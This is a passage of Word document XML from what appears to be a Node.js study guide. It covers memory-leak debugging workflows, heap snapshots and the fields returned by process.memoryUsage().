    <w:p w14:paraId="7784E91B" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Browser DevTools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF9E21" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Chrome DevTools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use the Memory tab to take heap snapshots, record allocations, and perform garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392326D" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VisualVM (for JavaScript with JVM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA562A7" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If you’re working with a JavaScript environment that uses JVM (like Nashorn or GraalVM), VisualVM can help analyze memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C67F75"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rPr>
        <w:t>Example Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B14565C" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Start by Monitoring Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564203BA" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use process.memoryUsage() to get a baseline of memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27128113" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43"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console.log(process.memoryUsage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE7957" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Take Initial Heap Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1C45D" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use node --inspect and Chrome DevTools or tools like clinic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC701BE" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run Your Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ACDAE" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simulate typical use cases and monitor for signs of increasing memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D18F8F" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Take Subsequent Heap Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D4AD2" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compare snapshots to see if memory usage is increasing without being freed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC4D60" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Analyze Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06215C15" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Look for retained objects or growing data structures. Pay attention to the Heap Snapshot and Allocation Profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D63D03" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fix and Re-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF7C72" w14:textId="77777777" w:rsidR="00172E43" w:rsidRPr="00DA2F32" w:rsidRDefault="00172E43" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Address the identified issues, fix the leaks, and re-test to ensure the problem is resolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4111CB" w14:textId="77777777" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF0F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35771862" w14:textId="1D85E56D" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc178383272"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the process.memoryUsage() method, and what information does it provide?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="7E15A089" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The process.memoryUsage() method in Node.js provides information about the memory usage of the current Node.js process. This method returns an object containing several properties that give insights into the memory consumption of your application. It's useful for diagnosing memory issues and understanding how your application uses memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC994A"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rPr>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B0D9C"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const memoryUsage = process.memoryUsage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B60BDD"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rPr>
        <w:t>Properties Returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2073C" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The object returned by process.memoryUsage() typically contains the following properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C5C7E" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rss</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Resident Set Size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645237E" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Represents the total memory allocated for the process, including all C++ objects and JavaScript objects, as well as other overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F6AD3" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This value includes the memory used by the Node.js process, including code, stack, heap, and other resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61D028" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heapTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B6E84" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Represents the total size of the allocated heap, which includes all memory reserved for JavaScript objects and data structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B8BA7" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This value reflects the amount of memory the V8 engine has allocated for the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20396D5F" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heapUsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562597F9" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Represents the amount of memory currently used by the V8 heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4409B7" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This value indicates the actual amount of memory that is actively being used by JavaScript objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C359EA6" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
